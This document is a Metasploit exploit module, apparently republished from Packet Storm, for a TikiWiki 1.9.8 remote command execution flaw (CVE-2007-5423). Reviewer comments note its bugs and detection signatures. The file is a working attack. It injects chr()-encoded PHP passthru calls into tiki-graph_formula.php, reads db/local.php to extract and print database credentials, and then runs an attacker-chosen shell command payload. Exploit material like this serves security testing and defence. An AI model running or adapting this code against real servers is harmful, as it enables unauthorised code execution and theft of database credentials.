
TikiWiki tiki-graph_formula Remote Command Execution

2009-10-3000:00:00
Matteo Cantoni
packetstormsecurity.com

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient

  # Module metadata (name, references, payload constraints) and the single
  # option this module takes: URI, the directory TikiWiki is installed under
  # (defaults to "/tikiwiki"). Payloads are restricted to the 'cmd' type with
  # a 1024-byte space, because the injected PHP hands the payload string to
  # passthru() (see #exploit).
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'TikiWiki tiki-graph_formula Remote Command Execution',
      'Description' => %q{
TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary commands. 
The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input 
supplied to the f variable, which may allow a remote attacker to execute arbitrary PHP 
commands resulting in a loss of integrity.
},
      'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision$',
      'References' =>
        [
          ['CVE', '2007-5423'],
          ['OSVDB', '40478'],
          ['BID', '26006'],
        ],
      'Privileged' => false,
      'Payload' =>
        {
          'DisableNops' => true,
          'Space' => 1024,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby bash telnet',
            }
        },
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Targets' => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Oct 10 2007',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),
      ], self.class)
  end

  # Fingerprints the target by fetching tiki-index.php and looking for a
  # "TikiWiki v1." or "TikiWiki 1." string in the body (the dots in the regex
  # are unescaped, so they match any character).
  # NOTE(review): any 1.x banner yields Vulnerable; fixed 1.9.x releases are
  # not told apart from affected ones, so read the result as "1.x present",
  # not "confirmed exploitable".
  # NOTE(review): unlike #exploit, res.body is not nil-checked before .match
  # is called on it.
  #
  # @return [Exploit::CheckCode] Vulnerable when the banner matches, else Safe
  def check
    # Second argument is the request timeout (seconds).
    res = send_request_raw({
      'uri' => datastore['URI'] + "/tiki-index.php",
      'method' => 'GET',
      'headers' =>
        {
          # Fixed, dated User-Agent; every request this module sends uses the
          # same value, which makes it a usable log signature.
          'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
          'Connection' => 'Close',
        }
    }, 25)

    if (res and res.message == "OK" and res.body.match(/TikiWiki v1.|TikiWiki 1./))
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  # Sends two GET requests to tiki-graph_formula.php. In both, the f[]
  # parameter carries PHP of the form x.tan.passthru(<chr() chain>).die(),
  # where every byte of the shell command is spelled as chr(n) and the
  # command is bracketed by "echo YYY" so its output can be cut out of the
  # response between the YYY markers.
  #
  # Request 1 (url_db_local): the chr() chain decodes to
  # "echo YYY;cat db/local.php;echo YYY"; the database settings (db_tiki,
  # host_tiki, user_tiki, pass_tiki, ...) are then extracted from the
  # response and printed. This is a credential disclosure in its own right,
  # independent of whether the payload later succeeds.
  # Request 2 (url_cmd): the same wrapper around the selected cmd payload.
  #
  # Detection note: both requests share the static User-Agent above, a GET
  # to tiki-graph_formula.php with w=1&h=1&s=1&min=1&max=2, and an f[] value
  # containing "passthru(" followed by a long ".chr(" sequence.
  def exploit

    # First request: read db/local.php via the chr()-encoded command.
    url_db_local = datastore['URI'] +
      "/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(" +
      "chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)." + "chr(59)." +
      "chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112)." +
      "chr(59)." + "chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)" +
      ").die()&t=png&title="

    print_status("Sending request...")

    res = send_request_raw({
      'uri' => url_db_local,
      'method' => 'GET',
      'headers' =>
        {
          'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
          'Connection' => 'Close',
        }
    }, 25)

    if (res and res.message == "OK" and res.body)
      print_status("The server returned : #{res.code} #{res.message}")
      print_status("Server version : #{res.headers['Server']}")

      # Pull the PHP assignments out of the echoed db/local.php. Each match is
      # nil when its pattern is absent from the body.
      db_tiki = res.body.match(/db_tiki='(.*?)';/m)
      dbversion = res.body.match(/dbversion_tiki='(.*?)';/m)
      host_tiki = res.body.match(/host_tiki='(.*?)';/m)
      user_tiki = res.body.match(/user_tiki='(.*?)';/m)
      pass_tiki = res.body.match(/pass_tiki='(.*?)';/m)
      dbs_tiki = res.body.match(/dbs_tiki='(.*?)';/m)

      print_status("TikiWiki database informations : \n")

      # NOTE(review): each [1] below raises NoMethodError on a nil match, so a
      # 200 response that does not contain the file (non-vulnerable host,
      # different config layout) aborts the module here, before the payload
      # request is sent. A nil guard per field, or a single "file not found"
      # branch, would make this path fail cleanly.
      print("db_tiki : " + db_tiki[1] + "\n")
      print("dbversion : " + dbversion[1] + "\n")
      print("host_tiki : " + host_tiki[1] + "\n")
      print("user_tiki : " + user_tiki[1] + "\n")
      print("pass_tiki : " + pass_tiki[1] + "\n")
      print("dbs_tiki : " + dbs_tiki[1] + "\n\n")
    else
      print_status("No response from the server")
    end

    # NOTE(review): `command` is assigned but never used; `encoded` is what
    # goes into the URL.
    command = Rex::Text.uri_encode(payload.encoded)
    # Payload bytes as a dot-joined chr() chain, followed by a space (chr(32)).
    encoded = payload.encoded.unpack('C*').map { |c| "chr(#{c})"}.join('.') + ".chr(32)"

    # Second request: same wrapper, with the payload in place of the file read.
    url_cmd = datastore['URI'] + "/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(" +
      "chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)." + "chr(59)." + encoded + ".chr(59)." +
      "chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)" + ").die()&t=png&title="

    print_status("Sending request...")

    res = send_request_raw({
      'uri' => url_cmd,
      'method' => 'GET',
      'headers' =>
        {
          'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
          'Connection' => 'Close',
        }
    }, 25)

    if (res and res.message == "OK" and res.body)

      print_status("The server returned : #{res.code} #{res.message}")
      # Command output sits between the two YYY lines; /m lets .* span
      # newlines, and the greedy .* takes everything up to the last YYY.
      cmd_output = res.body.match(/YYY\n(.*)\nYYY/m)

      if (cmd_output)
        print_status("Command output from the server :")
        print("\n" + cmd_output[1] + "\n\n")
      else
        # No markers in the body: the injected PHP did not run, or the output
        # was not echoed back.
        print_status("This server may not be vulnerable")
      end

    else
      print_status("No response from the server")
    end
  end

end
  
`
